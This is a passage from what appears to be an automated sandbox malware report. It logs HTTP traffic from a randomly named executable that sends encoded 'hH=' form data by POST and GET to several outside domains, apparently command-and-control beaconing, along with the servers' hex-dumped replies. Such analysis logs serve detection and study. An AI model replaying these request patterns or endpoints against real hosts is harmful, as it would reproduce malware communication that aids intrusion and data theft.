                Data Raw: 68 48 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6e 55 55 61 54 73 6e 6b 4f 7a 77 74 47 39 59 75 51 47 70 35 64 4b 6b 44 4c 4d 31 35 53 6e 4d 2f 79 63 38 4c 4e 44 54 51 6b 58 62 61 49 6c 51 2b 6d 43 32 51 75 62 64 6b 31 52 6d 61 68 55 4f 6f 4c 61 62 32 66 56 54 68 63 46 69 6e 59 39 4f 53 42 76 70 56 41 71 77 41 71 6e 41 4c 6d 78 30 48 45 47 70 75 35 45 41 4e 70 42 6b 72 6c 48 6f 48 55 53 30 54 51 43 6e 5a 55 6f 67 31 4c 73 36 6f 4e 47 62 72 37 6e 68 6c 52 4f 74 34 52 54 6d 38 55 52 61 4d 32 6c 35 32 63 32 79 4c 6e 35 72 4a 53 76 32 48 2b 48 48 59 55 73 53 48 2b 64 73 72 68 67 6a 4c 65 64 51 65 6b 51 30 30 34 72 76 31 58 47 4e 47 68 59 59 34 35 6f 6b 57 30 68 2f 56 73 35 56 69 79 35 6f 43 44 42 5a 70 55 67 62 66 70 52 64 78 70 4c 72 6d 37 63 6b 50 65 58 36 41 35 57 41 78 66 48 73 45 58 4e 6c 45 6c 5a 6d 30 66 6f 4f 74 6d 71 46 44 61 4b 2f 6c 67 6e 2b 75 4d 6c 41 69 73 79 75 75 4f 34 2b 4c 70 52 2b 39 78 68 79 6a 4d 75 32 6f 48 39 6f 56 6f 48 72 65 55 36 67 76 62 65 73 4f 4a 35 2b 75 53 41 67 58 54 6e 4d [TRUNCATED]
                Data Ascii: hH=FswQWeNiBqtZnUUaTsnkOzwtG9YuQGp5dKkDLM15SnM/yc8LNDTQkXbaIlQ+mC2Qubdk1RmahUOoLab2fVThcFinY9OSBvpVAqwAqnALmx0HEGpu5EANpBkrlHoHUS0TQCnZUog1Ls6oNGbr7nhlROt4RTm8URaM2l52c2yLn5rJSv2H+HHYUsSH+dsrhgjLedQekQ004rv1XGNGhYY45okW0h/Vs5Viy5oCDBZpUgbfpRdxpLrm7ckPeX6A5WAxfHsEXNlElZm0foOtmqFDaK/lgn+uMlAisyuuO4+LpR+9xhyjMu2oH9oVoHreU6gvbesOJ5+uSAgXTnMwBDRFYfK24ctQ9aSLqtAQ+x0d2oBBBuAul8his0WfiUr4i5Um7gh2GZWEUZOI4sg8aYWvHPv3VNjfpnW2jSL9CP9100zyFNVnJSlFOOrz0+0fexWo9YWTWjWqeMlCMsY//mCSUmbaYPTQlZbgylCy+pMxwkJE8LKmynOdbBuOa1AerQ3hJm3euO1OeMeWBmHHcZAvQuHtUthzpg/pt+TMzHmx5quq/Vl8Cfw/Vp60DGvqICrr8yvgG7bl/rhUByXOj5LdFQ9jWYXv7WWeiDFYWB2Oi1lrIR74/W/78SieNWwe+38Vm7d3jPZJVBN+3tv4wj7qBgvTgWydJ16kJgjz/S8b4vjBvKlX1+O8uOY0Hfmab0pYTs76H6HSG7Zx1sOMHGORkMHofLgu4pHMbzx9mUjriO44/kdOLVCKJxVqwMdNDkBmvhOfUc+1Fmj5ZqTs8nLcSdgpXSxSYd7FxGM3AeOskAlZOBy5OPtPUaBNa1Y9pbQh4wN6omqs8SEWVk3dLxgxKApksI9Q/ohQeMId97RzuGhHalEqDCygs0uK2djj5dxCE3JuqH81YsX1h/KeRuihFqwzQ6p4v08tlADXik1CDXq71Pzy3O410vPvyNLkzZJ09KVQ+PQNnbOQj+bdFiWoQhnLQOfStHDNsz/BdJGVQpd7ukfQU [TRUNCATED]
                Jul 3, 2024 08:55:18.664436102 CEST533INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:18 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                24192.168.2.949738203.161.49.220801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:20.732692957 CEST470OUTGET /csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:21.331608057 CEST548INHTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:21 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                25192.168.2.94973935.227.248.111801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:26.552686930 CEST722OUTPOST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 56 6d 69 69 34 45 71 45 2f 75 51 4f 33 5a 78 33 47 4b 39 42 6a 37 76 33 64 6d 66 37 74 4f 6e 4e 34 54 4e 72 45 63 36 6c 38 42 6d 75 56 6a 38 53 44 6c 4d 71 44 74 69 46 74 49 75 62 38 68 4c 76 73 33 65 74 2b 76 75 37 53 74 71 57 53 64 4f 6f 74 52 71 59 75 4a 64 61 58 70 6c 6d 75 37 53 46 63 4a 61 54 75 49 54 50 70 42 6c 59 58 61 53 45 73 79 44 2f 41 35 6f 70 56 4b 43 49 59 7a 6e 52 53 61 67 73 49 6d 50 4d 34 46 64 59 6c 6a 6b 46 58 77 2f 76 61 46 63 50 58 58 7a 4a 78 43 42 53 56 66 74 6c 6a 6d 47 67 75 73 36 47 6e 51 41 39
                Data Ascii: hH=22K3e1HjhIYNVmii4EqE/uQO3Zx3GK9Bj7v3dmf7tOnN4TNrEc6l8BmuVj8SDlMqDtiFtIub8hLvs3et+vu7StqWSdOotRqYuJdaXplmu7SFcJaTuITPpBlYXaSEsyD/A5opVKCIYznRSagsImPM4FdYljkFXw/vaFcPXXzJxCBSVftljmGgus6GnQA9
                Jul 3, 2024 08:55:27.206048012 CEST176INHTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:27 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:27.208880901 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                26192.168.2.94974035.227.248.111801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:29.093708992 CEST746OUTPOST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 58 47 53 69 2b 6a 2b 45 75 65 51 50 71 70 78 33 50 71 39 46 6a 37 7a 33 64 69 76 4e 74 39 44 4e 34 32 78 72 48 59 57 6c 35 42 6d 75 65 44 38 58 63 56 4d 6c 44 74 2b 37 74 4b 71 62 38 68 66 76 73 33 4f 74 39 59 36 36 41 4e 71 55 4c 74 4f 6d 79 68 71 59 75 4a 64 61 58 6f 55 44 75 37 61 46 63 61 79 54 38 38 48 4f 67 68 6c 66 65 36 53 45 6e 53 44 42 41 35 6f 66 56 4f 61 75 59 32 6a 52 53 62 51 73 49 79 6a 44 32 46 64 6b 36 7a 6b 58 57 43 36 45 44 30 59 45 59 47 50 35 6e 7a 73 7a 66 65 4e 37 79 55 50 37 37 37 36 68 67 33 4a 56 41 41 78 58 32 69 67 5a 67 53 44 61 61 6a 48 42 4f 75 35 42 49 51 3d 3d
                Data Ascii: hH=22K3e1HjhIYNXGSi+j+EueQPqpx3Pq9Fj7z3divNt9DN42xrHYWl5BmueD8XcVMlDt+7tKqb8hfvs3Ot9Y66ANqULtOmyhqYuJdaXoUDu7aFcayT88HOghlfe6SEnSDBA5ofVOauY2jRSbQsIyjD2Fdk6zkXWC6ED0YEYGP5nzszfeN7yUP7776hg3JVAAxX2igZgSDaajHBOu5BIQ==
                Jul 3, 2024 08:55:29.742577076 CEST176INHTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:29 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:29.745209932 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                27192.168.2.94974135.227.248.111801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:31.620143890 CEST1759OUTPOST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 32 32 4b 33 65 31 48 6a 68 49 59 4e 58 47 53 69 2b 6a 2b 45 75 65 51 50 71 70 78 33 50 71 39 46 6a 37 7a 33 64 69 76 4e 74 39 4c 4e 34 67 46 72 48 35 57 6c 2b 42 6d 75 64 44 38 57 63 56 4d 43 44 74 32 33 74 4b 6d 55 38 6e 54 76 2b 6b 32 74 31 4e 57 36 5a 39 71 55 44 4e 4f 72 74 52 72 59 75 4a 4e 57 58 6f 6b 44 75 37 61 46 63 63 4f 54 2f 6f 54 4f 73 42 6c 59 58 61 53 49 73 79 43 73 41 35 77 50 56 4f 57 2b 59 46 62 52 58 4c 41 73 50 48 50 44 70 56 64 63 35 7a 6c 45 57 44 47 62 44 30 55 41 59 47 36 69 6e 30 49 7a 65 36 73 33 75 6c 4c 68 73 4b 47 72 70 32 52 48 45 67 74 72 36 44 56 2b 35 69 54 50 48 44 57 4c 4d 74 6c 52 64 4c 43 67 38 5a 44 78 6c 6b 58 66 76 37 55 38 52 42 43 30 79 45 63 67 5a 69 31 56 66 6d 63 72 38 69 38 41 62 6b 36 4f 6f 6f 47 77 68 45 30 4b 2b 75 48 6a 7a 70 6d 79 35 4d 6f 39 73 59 32 35 30 77 76 2b 57 4e 51 76 5a 57 78 68 4b 5a 62 68 38 65 67 73 67 5a 31 32 4f 57 4b 49 35 67 54 48 5a 65 63 55 71 59 70 58 53 57 7a 49 51 64 56 50 76 66 4c 47 48 59 63 49 55 76 32 46 64 73 2b [TRUNCATED]
                Data Ascii: hH=22K3e1HjhIYNXGSi+j+EueQPqpx3Pq9Fj7z3divNt9LN4gFrH5Wl+BmudD8WcVMCDt23tKmU8nTv+k2t1NW6Z9qUDNOrtRrYuJNWXokDu7aFccOT/oTOsBlYXaSIsyCsA5wPVOW+YFbRXLAsPHPDpVdc5zlEWDGbD0UAYG6in0Ize6s3ulLhsKGrp2RHEgtr6DV+5iTPHDWLMtlRdLCg8ZDxlkXfv7U8RBC0yEcgZi1Vfmcr8i8Abk6OooGwhE0K+uHjzpmy5Mo9sY250wv+WNQvZWxhKZbh8egsgZ12OWKI5gTHZecUqYpXSWzIQdVPvfLGHYcIUv2Fds+I8t7woyi9miSBOPDA/0Ab2RsMgoEHqej8/qIBrP1cutyzVTn+qX6EfXwU6XRGi6HG2KTaylohBm6fYYMDsjzmkBEIKFrz6jfrCpRnGwoMt69qxbdc2LO8gA/G1EbNUIG1mSkEgXOxeKZpK+Fuko7/jUn6ck4PN05RLEJoIj/R9zjJ+mMSlmMTMX9r385rkqK0rcs0gDlqPEv2FOqsZUfz80rMBu36Kxh19KyddfYqrskxHNo/XaTtYRmAaUrEoHGCPECUBxn6RkJ3o9aDzmE4r0Q1tg+kCsTa+N8l8g4qGaGxWzBu8oryHgB+/IudnR1hycB4h+Sh1xvCI9YsRXj7ar+32YQ3z3sMEc1bFAcTryVd5H32Ul3D/XuMYGlqEIfCC7ySnaOJiV5MAS+bB8t8A3zCwot3wO/iH0DaErFz+DUCYWEvlPQvJLVZaGD3bKjBN9VWOcPRbz1SToiuw6X9RTeaytJ2bjwyTyyAMOsG3Amg0g2ZjoZWFOWH7eST5EZ2guEqBCGcRNEZMl+3vAfylGLrs0NJdQUUvV3hZS4k5KPfxkdK6AX9VaIZFNkhstLIIljF61RtI5zqnFK84mK256OMJE/kAQa0UWqKXPI6z501VKGaUlzFkuMp9psk/9Athfvy7rsxCDOFRsoc4zReaPk1fbBuyyzs1 [TRUNCATED]
                Jul 3, 2024 08:55:32.248908043 CEST176INHTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:32 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:32.254739046 CEST157INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                28192.168.2.94974235.227.248.111801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:34.151087999 CEST468OUTGET /qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:34.788007021 CEST300INHTTP/1.1 200 OK
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:34 GMT
                Content-Type: text/html
                Content-Length: 5161
                Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                Vary: Accept-Encoding
                ETag: "65a4939c-1429"
                Cache-Control: no-cache
                Accept-Ranges: bytes
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:34.801292896 CEST1236INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63
                Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                Jul 3, 2024 08:55:34.801470995 CEST1236INData Raw: 77 20 49 6d 61 67 65 29 2e 73 72 63 3d 6e 7d 66 75 6e 63 74 69 6f 6e 20 72 65 70 6f 72 74 4c 6f 61 64 69 6e 67 28 6e 29 7b 6e 3d 6e 7c 7c 7b 7d 3b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f
                Data Ascii: w Image).src=n}function reportLoading(n){n=n||{};var o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.
                Jul 3, 2024 08:55:34.801484108 CEST1236INData Raw: 74 72 3d 64 73 66 72 70 66 76 65 64 6e 63 70 73 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f
                Data Ascii: tr=dsfrpfvedncpssntnwbipreimeutsv");(e()||r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/ap
                Jul 3, 2024 08:55:34.802160978 CEST672INData Raw: 28 22 73 72 63 22 2c 22 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 30 31 2f 77 65 6c 66 61 72 65 61 67 65 6e 63 79 2f 76 63 6f 6e 73 6f 6c 65 2e 6d 69 6e 2d 33 2e 33 2e 30 2e 6a 73 22 29 2c 24 68 65 61 64 2e 69 6e 73 65 72
                Data Ascii: ("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src
                Jul 3, 2024 08:55:34.802171946 CEST781INData Raw: 75 6c 20 69 64 3d 22 64 65 73 63 22 20 63 6c 61 73 73 3d 22 64 65 73 63 22 3e 3c 6c 69 3e 3c 68 31 3e e7 b4 a7 e6 80 a5 e9 80 9a e7 9f a5 3c 2f 68 31 3e 3c 62 72 3e 3c 68 32 3e e6 9c ac e7 ab 99 e4 bb 85 e6 94 af e6 8c 81 3c 62 20 69 64 3d 22 75
                Data Ascii: ul id="desc" class="desc"><li><h1></h1><br><h2><b id="ucweb" onclick='baiduPush("click","btn","ucweb")'>/</b></h2></li></ul><div id="btn" class="btn-dl"><div id="btndl" onclick='baiduPus


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                29192.168.2.94974391.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:40.021502972 CEST731OUTPOST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 6b 6a 62 4b 76 56 48 4f 2f 4f 75 46 53 6a 6c 4c 50 79 58 2b 50 30 4c 7a 69 69 2f 38 57 78 4a 6e 4a 4f 79 2f 52 6d 6a 58 51 72 47 41 4d 32 63 4d 35 6b 4f 69 4b 39 54 65 37 61 78 39 7a 78 7a 70 37 51 37 35 46 6c 61 71 5a 44 35 52 30 71 71 75 6c 4e 53 35 4f 73 4d 2f 65 69 4d 69 44 6e 54 74 37 59 4e 54 73 39 62 6d 37 33 45 67 36 33 48 34 31 4a 52 41 55 48 51 5a 53 75 76 72 50 72 72 71 70 74 2f 4c 50 77 58 76 6f 66 4d 4d 6c 58 4f 36 66 36 37 74 52 6f 66 64 64 34 50 52 6b 4e 47 4a 4c 43 66 59 6d 59 39 39 31 55 4b 63 33 52 38 4d 45 68 4e 72 44 35 6c 6b 57 34 72 4d
                Data Ascii: hH=kjbKvVHO/OuFSjlLPyX+P0Lzii/8WxJnJOy/RmjXQrGAM2cM5kOiK9Te7ax9zxzp7Q75FlaqZD5R0qqulNS5OsM/eiMiDnTt7YNTs9bm73Eg63H41JRAUHQZSuvrPrrqpt/LPwXvofMMlXO6f67tRofdd4PRkNGJLCfYmY991UKc3R8MEhNrD5lkW4rM
                Jul 3, 2024 08:55:40.660558939 CEST305INHTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:40 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                30192.168.2.94974491.195.240.19801356C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                TimestampBytes transferredDirectionData
                Jul 3, 2024 08:55:42.559837103 CEST755OUTPOST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
